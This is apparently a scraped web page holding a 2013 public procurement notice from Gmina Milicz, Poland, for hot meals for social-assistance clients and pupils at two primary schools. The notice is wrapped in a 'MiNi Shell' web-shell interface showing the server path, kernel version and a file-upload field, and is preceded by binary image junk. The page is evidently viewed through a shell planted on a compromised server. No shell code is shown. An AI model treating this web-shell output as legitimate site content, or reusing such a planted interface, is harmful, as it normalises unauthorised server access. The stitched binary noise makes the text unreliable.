JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130102/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130102/1340-N-2013.html

<p class="kh_header"><b>Milicz: Dożywianie podopiecznych Ośrodka Pomocy Społecznej w Miliczu (Część I) oraz uczniów Szkoły Podstawowej w Dunkowej i Szkoły Podstawowej  w Czatkowicach (Część II)</b><br>
<b>Numer ogłoszenia: 1340 - 2013; data zamieszczenia: 02.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Milicz , ul. Trzebnicka 2, 56-300 Milicz, woj. dolnośląskie, tel. 071 3840004 w. 314, faks 071 3841119.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.milicz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dożywianie podopiecznych Ośrodka Pomocy Społecznej w Miliczu (Część I) oraz uczniów Szkoły Podstawowej w Dunkowej i Szkoły Podstawowej  w Czatkowicach (Część II).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZĘŚĆ I: Przygotowanie, dostawa i wydawanie jednego gorącego posiłku jednodaniowego dla podopiecznych Ośrodka Pomocy Społecznej w Miliczu.

CZĘŚĆ II: Przygotowanie, dostawa i wydawanie jednego gorącego posiłku typu drugiego dania dla dzieci uczących się w Szkole Podstawowej w Dunkowej i w Szkole Podstawowej  w Czatkowicach.

I. Na jeden gorący posiłek dla podopiecznych Ośrodka Pomocy Społecznej w Miliczu składa się:
- Zupa (minimum 500 ml) z obowiązkową wkładką (min. 100 g) i pieczywem (min. 100 g) - maksymalnie cztery dni w tygodniu, 
- Danie mięsne- jeden dzień w tygodniu z wyjątkiem piątku.

W skład zupy wchodzą n/w produkty:
- Porcje rosołowe
- Warzywa
- Zielenina (koperek, pietruszka, szczypiorek)
- Przyprawy (sól, pieprz, ziele angielskie, liść laurowy, przyprawa warzywna)
- Wkładka: kiełbasa, parówka, jajko w ilości min. 100 g, (jajka nie częściej niż 2 razy w miesiącu)

W skład dania MIĘSNEGO wchodzą:

- Ziemniaki (200 g), kasze, makaron lub ryż (100 g), 
- Porcja mięsa (tj. np. kotlet drobiowy, wieprzowy, mielony) lub ryby (200 g),
- Tłuszcze, smalec
- Surówki warzywne (100 g),
- Kompot lub napój (200 ml).


1. Zamówienie przewiduje około 9.680 posiłków - dla około 55 osób przez około 176 dni.
Liczba osób dożywianych może ulec zmianie.
2. Minimalna liczba podopiecznych, dla których wydany będzie posiłek wynosi 10 osób. 
3. Posiłki muszą być urozmaicone, przygotowywane ze świeżych artykułów spożywczych posiadających aktualne terminy przydatności do spożycia, zgodnie z wymogami sztuki kulinarnej                        i sanitarnej dla żywienia zbiorowego.
4. Posiłki mają być wydawane i spożywane w pomieszczeniu (zgodnie z definicją słownikową - części budynku o określonym przeznaczeniu) zapewnionym przez Wykonawcę, które znajdować się ma terenie miasta Milicz, w odległości do 1500 m od siedziby PKS w Miliczu. 
5. Lokalizacja takiego pomieszczenia powinna zapewniać samodzielny dostęp osobom uprawnionym, w tym osobom mającym problemy z poruszaniem się.
6. W pomieszczeniu przeznaczonym do spożywania posiłków powinna znajdować się odpowiednia ilość miejsc siedzących przeznaczonych do spożywania posiłków.
7. Stan pomieszczenia powinien być zgodny z wymogami sanitarnymi.
8. Posiłki mają być wydawane w dni nauki szkolnej w porze obiadowej (w godzinach 12:00-15:00). Dokładne godziny dostarczenia i wydawania posiłków zostaną ustalone pomiędzy Zamawiającym                     i Wykonawcą.
9. Jeżeli posiłki nie będą przygotowywane na miejscu, tj. w miejscu wydawania i spożywania, Wykonawca jest zobowiązany przewozić posiłki dla podopiecznych Ośrodka Pomocy Społecznej               w Miliczu w specjalnie do tego dostosowanym samochodzie spełniającym wszelkie wymogi sanitarne zatwierdzone przez Państwową Stację Sanitarno-Epidemiologiczną.
10. Wykonawca jest zobowiązany przewozić posiłki w atestowanych termosach gwarantujących utrzymanie odpowiedniej temperatury oraz jakości przewożonych potraw.
11. Koszt naczyń jednorazowych (pojemników, sztućców) musi być wkalkulowany w cenę posiłku.
12. Ilość dostarczanych porcji posiłków będą określać wykazy zawierające imię i nazwisko podopiecznych Ośrodka Pomocy Społecznej w Miliczu, sporządzone przez Zamawiającego                   i  dostarczane w uzgodniony sposób Wykonawcy.
13. Posiłki wydawane będą osobom uprawnionym na podstawie miesięcznych kart (bloczków) przygotowanych przez Wykonawcę i wydanych uprawnionym do skorzystania z posiłku podopiecznym Zamawiającego.
14. Osoba uprawniona do korzystania z posiłków, po otrzymaniu z Ośrodka Pomocy Społecznej decyzji administracyjnej przyznającej jej takie prawo po spełnieniu odpowiednich warunków ustawowych,  zgłasza się po bloczek do Wykonawcy, kwitując jego odbiór własnoręcznym podpisem.
15. Każda karta (bloczek) zawiera ponumerowane odcinki, których liczba odpowiada liczbie dni danego miesiąca.
16. W przypadku zmiany ilości uprawnionych do dożywiania osób, Zamawiający powiadomi Wykonawcę 1 dzień przed zaistniałą zmianą. Powiadomienie nastąpi w ustalony sposób (telefonicznie, pocztą elektroniczną).
17. Zamawiający nie dopuszcza powtarzalności posiłków w ciągu tygodnia.
18. Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia. Wymagana jest należyta staranność przy realizacji niniejszego zadania. 
19. Zamawiający ma prawo kontroli Wykonawcy w trakcie realizacji zadania.
II. Na jeden gorący posiłek dla dzieci w Szkole Podstawowej w Dunkowej i w Szkole Podstawowej  w Czatkowicach  składa się: drugie danie mięsne - minimum 3 razy    w tygodniu i drugie danie bezmięsne- maksymalnie 2 razy w tygodniu (w tym obowiązkowo  w piątek) oraz kompot lub napój.

W skład potraw wchodzą: 

1. Drugie danie MIĘSNE:

- Ziemniaki (200 g), kasze, makaron lub ryż (100 g), 
- Porcja mięsa (tj. np. kotlet drobiowy, wieprzowy, mielony) lub ryby (200 g),
- Tłuszcze, smalec,
- Surówki warzywne (100 g),
- Kompot lub napój (200 ml).
 
2. Drugie danie BEZMIĘSNE:

- Pierogi ruskie (200 g), makaron z serem, naleśniki, placki, łazanki (400 g),
- Kompot lub napój (200 ml).

1. Zamówienie przewiduje około 5.100 posiłków - dla około 30 uczniów przez około 170 dni.
Liczba dożywianych uczniów może ulec zmianie.
2. Posiłki będą dostarczane i wydawane w n/w placówkach:
- Szkoła Podstawowa w Dunkowej, Dunkowa 1, 56-300 Milicz.
- Szkoła Podstawowa w Czatkowicach, Czatkowice, ul. Szosowa 2, 56-300 Milicz,
3. Przewidywana liczba dożywianych uczniów w szkołach wynosi około 30 uczniów, w rozbiciu na poszczególne szkoły:
- Szkoła Podstawowa w Dunkowej- około 10 uczniów.
- Szkoła Podstawowa w Czatkowicach- około 20 uczniów,
4. Minimalna liczba uczniów, dla których przywieziony i wydany będzie posiłek wynosi:
- Szkoła Podstawowa w Dunkowej- 3 uczniów.   
- Szkoła Podstawowa w Czatkowicach- 5 uczniów, 
5. Posiłki muszą być przygotowywane ze świeżych artykułów spożywczych posiadających aktualne terminy przydatności do spożycia, zgodnie z wymogami sztuki kulinarnej i sanitarnej dla żywienia zbiorowego. 
6. Wykonawca jest zobowiązany przewozić posiłki dla uczniów  w specjalnie do tego dostosowanym samochodzie spełniającym wszelkie wymogi sanitarne zatwierdzone przez Państwową Stację Sanitarno-Epidemiologiczną.
7. Wykonawca jest zobowiązany przewozić posiłki w atestowanych termosach gwarantujących utrzymanie odpowiedniej temperatury oraz jakości przewożonych potraw.
8. Na cenę usługi składa się koszt posiłku wraz z naczyniami i sztućcami jednorazowymi oraz koszt dowozu za 1 km na najkrótszych trasach:  I) Milicz-Dunkowa-Milicz, II) Milicz-Czatkowice-Milicz.  
9. Posiłek powinien być dostarczony do szkół ciepły- temperatura posiłków: od 50 st. C do 60 st. C.
10. Wykonawca jest zobowiązany wydać posiłki w szkole w specjalnie do tego przeznaczonym pomieszczeniu (klasie) znajdującym się w budynku szkoły w naczyniach jednorazowych, których koszt wkalkulowany jest w cenę posiłku.
11. Stan pomieszczenia powinien być zgodny z wymogami sanitarnymi.
12. Posiłki mają być wydawane w dni nauki szkolnej w porze obiadowej (g. 11:00-12:00). Godziny dostarczania i wydawania posiłków mają być zgodne z rozkładem zajęć lekcyjnych (przerwa). Dokładne godziny dostarczenia i wydawania posiłków zostaną ustalone pomiędzy Zamawiającym                   i Wykonawcą.
13. Ilość porcji posiłków w poszczególnych szkołach będą określać wykazy z poszczególnych szkół, zawierające nazwisko i imię ucznia.
14. Wykazy uczniów będą sporządzone przez Zamawiającego i dostarczane w uzgodniony sposób Wykonawcy.
15. Jadłospis układany będzie przez Wykonawcę na okres 10 dni żywieniowych i dostarczany do dyrektorów szkół z wyprzedzeniem 2-dniowym.
16. Posiłki wydawane będą na podstawie miesięcznych kart (bloczków) przygotowanych przez Wykonawcę i wydanych uprawnionym do skorzystania z posiłku uczniom szkół.
17. Każda karta (bloczek) zawiera ponumerowane odcinki, których liczba odpowiada liczbie dni danego miesiąca.
18. W przypadku zmiany ilości uprawnionych do dożywiania osób, Zamawiający powiadomi wykonawcę 1 dzień przed zaistniałą zmianą. Powiadomienie nastąpi w ustalony sposób (telefonicznie, pocztą elektroniczną). 
19. Zamawiający nie dopuszcza powtarzalności posiłków w ciągu tygodnia.
20. Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia. Wymagana jest należyta staranność przy realizacji niniejszego zadania. 
21. Zamawiający ma prawo kontroli Wykonawcy w trakcie realizacji zadania.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje w okresie 3 lat od udzielenia zamówienia podstawowego możliwość udzielenia zamówień uzupełniających w trybie zamówienia z wolnej ręki, których wartość nie przekroczy 50% wartości zamówienia podstawowego, na zasadach określonych w art. 67 ust. 1 pkt 6 ustawy z dnia 29 stycznia 2004 roku prawo zamówień publicznych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.31.00-3, 55.52.40.00-9, 55.32.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą, że wykonali w ciągu ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie) co najmniej jedną, trwającą 12 miesięcy kalendarzowych (lub kilka trwających krócej, jeżeli ich suma wynosi 12 miesięcy kalendarzowych) usługę codziennego (poza dniami wolnymi od nauki) dożywiania zbiorowego, obejmującą minimum 10 osób.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą, iż dysponują co najmniej 2 osobami o stażu pracy w żywieniu zbiorowym wynoszącym co najmniej 1 rok w odniesieniu do każdej z nich.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>I.Wraz z ofertą składane są następujące dokumenty i załączniki:
1) wypełniony i podpisany formularz ofertowy wg wzoru z załącznika nr 1 do Specyfikacji,
2) oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne zgodnie z art. 22 ust. 1 Ustawy wg wzoru z załącznika nr 2 do Specyfikacji.
II. Postanowienia dotyczące wnoszenia oferty wspólnej przez dwa lub więcej podmioty gospodarcze:
1) Wykonawcy zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia lub do reprezentowania ich w postępowaniu i zawarcia umowy; dokument pełnomocnictwa sporządzony zgodnie z przepisami prawa, winien być dołączony do oferty;
2) oferta winna być podpisana przez każdego uczestnika konsorcjum lub ustanowionego pełnomocnika;
3) oferta winna zawierać wszystkie dokumenty, oświadczenia i informacje wymienione w punkcie III.4.2) niniejszego ogłoszenia, dla każdego uczestnika konsorcjum z osobna, pozostałe zaś dokumenty składane są wspólnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość dokonania zmian do umowy na podstawie art. 144 ust. 1 Ustawy w następujących sytuacjach:
 a) z powodu okoliczności, których wystąpienie nastąpiło niezależnie od Wykonawcy bądź Zamawiającego (przykładowa okoliczność: siła wyższa); 
b) w przypadku zmiany stawki podatku od towarów i usług (VAT) na usługi określone w przedmiocie zamówienia, czego następstwem będzie zmiana wynagrodzenia umownego;
2.W tych przypadkach Strona dążąca do zmiany umowy każdorazowo obowiązana jest przedstawić na piśmie argumenty przemawiające za dokonaniem zmian do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.milicz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.bip.milicz.pl lub Urząd Miejski w Miliczu, ul. Trzebnicka 2, 56-300 Milicz, do pok. 58, w cenie 10,00 zł, na wniosek oferenta zgodnie z art. 42 ust. 2 ustawy Pzp.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.01.2013 godzina 10:00, miejsce: Ośrodek Pomocy Społecznej w Miliczu, ul. Trzebnicka 2A, 56-300 Milicz, pok. nr 1 , otwarcie ofert: 11.01.2013, godz. 10:30 (pokój nr 7).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com